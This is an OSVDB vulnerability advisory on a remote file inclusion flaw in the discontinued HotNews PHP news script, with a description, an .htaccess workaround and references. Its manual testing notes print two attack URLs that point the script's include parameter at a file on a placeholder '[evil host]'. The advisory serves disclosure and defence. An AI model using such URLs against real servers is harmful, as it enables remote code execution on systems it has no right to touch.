HotNews hnmain.in.php3 Arbitrary Code Execution

2004-01-03T00:00:00
ID OSVDB:3405
Type osvdb
Reporter OSVDB
Modified 2004-01-03T00:00:00

Description

Vulnerability Description

HotNews contains a flaw that may allow a malicious user to execute arbitrary code on a vulnerable system. The issue is triggered by a specially crafted URL request to the hnmain.inc.php3 script that specifies a malicious file from a remote system as a parameter. It is possible that the flaw may allow arbitrary code execution resulting in a loss of confidentiality, integrity, and/or availability.

Solution Description

Currently, there are no known upgrades or patches to correct this issue. The HotNews project has been discontinued. It is possible to correct the flaw by implementing the following workaround(s): Protect the "includes" directory with an .htaccess file or similar mechanism.

Short Description

HotNews contains a flaw that may allow a malicious user to execute arbitrary code on a vulnerable system. The issue is triggered by a specially crafted URL request to the hnmain.inc.php3 script that specifies a malicious file from a remote system as a parameter. It is possible that the flaw may allow arbitrary code execution resulting in a loss of confidentiality, integrity, and/or availability.

Manual Testing Notes

http://[victim]/includes/hnmain.inc.php3?config[incdir]=http://[evil host]/func.inc.php3 http://[victim]/includes/hnmain.inc.php3?config[incdir]=http://[evil host]/hndefs.inc.php

References:

Vendor URL: http://sourceforge.net/forum/forum.php?forum_id=342594 Secunia Advisory ID:10551 Other Advisory URL: http://archives.neohapsis.com/archives/bugtraq/2004-01/0021.html Keyword: File Inclusion ISS X-Force ID: 14140 Bugtraq ID: 9357